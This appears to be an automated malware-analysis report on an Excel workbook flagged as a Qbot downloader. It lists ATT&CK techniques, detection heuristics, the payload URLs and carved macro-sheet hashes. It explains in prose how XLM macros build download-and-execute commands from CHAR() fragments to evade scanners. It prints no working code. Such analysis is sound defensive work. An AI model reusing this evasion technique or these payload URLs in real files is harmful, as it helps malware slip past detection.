MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains Excel 4.0 macros, which are known to be used for malicious purposes. These macros are designed to download and execute a second-stage payload from the URLs http://aGertiokas1.ocx, http://aGertiokas2.ocx, and http://aGertiokas3.ocx. The ClamAV detection name 'Xls.Downloader.Qbot02221-9940029-0' strongly suggests the Qbot malware family.
Heuristics 3
-
Excel 4.0 macro sheet (13 sheet(s)) critical OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
-
XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOADAn Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
-
ClamAV: Xls.Downloader.Qbot02221-9940029-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.Qbot02221-9940029-0
Extracted artifacts 13
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_sheet_00.bin5fb5a9e6ec1dacc189efcc6a68093d9b5c376b223dcb27f862984427d2aac0e2 |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet1.bin | 363 bytes |
xlm_sheet_01.bindbdd4c1c8ee187d7c5430fa758515ddd8be11b44c3b4435564e175e4a11d05c3 |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet2.bin | 792 bytes |
xlm_sheet_02.binda4a3dd20598f5d8cf5375967227afea2603380fd81d339abf64327e3e444bad |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.bin | 2964 bytes |
xlm_sheet_03.bin7a9cb9f51e53cfc400e9eca3f75c6728794c807d79bae3ce31a35ca308c38b42 |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet3.bin | 1248 bytes |
xlm_sheet_04.bind7bed8c1f8d3057a1f3cf0b173e48bf44e4199fb1fc946acce5befaaa8bdb880 |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet4.bin | 619 bytes |
xlm_sheet_05.bin4d4dd95373ceffcdeae0a74dfa09b90bd3ce229ab64dd70c7fe0f05e5b469bbd |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet5.bin | 648 bytes |
xlm_sheet_06.bin8d957f41705fc5da60f409cd3c460bdb601935e6214bf78485f23a85cb252024 |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet6.bin | 622 bytes |
xlm_sheet_07.bin000bc8d70715fdc1e9f90bbf8ea8d827eb7d942c3f16b2c5b6d16539d6622ba7 |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet7.bin | 446 bytes |
xlm_sheet_08.bin3d7da882103e152fa19e77064137c97829f1e1a274c1affe1fac1b61da777fbd |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.bin | 801 bytes |
xlm_sheet_09.bin617d9277b8cae5e22b22f75d36f1c1410a208c497dfd9b1fc50732ce8b8e39ba |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet8.bin | 423 bytes |
xlm_sheet_10.bind5c4686b042d6a3a5b3054f9a908261594b4da3bb58f47c7667d2f76807eef6e |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet3.bin | 686 bytes |
xlm_sheet_11.bind70f9ec0a416d2c5d576f663a61e87e9c0546f1f91643f12f3b384ea04845e91 |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet4.bin | 726 bytes |
xlm_sheet_12.bin2bd138650fa507a83c5a96a8b7ece29759f24ed721eaf50eae3ada328413aacb |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet9.bin | 423 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.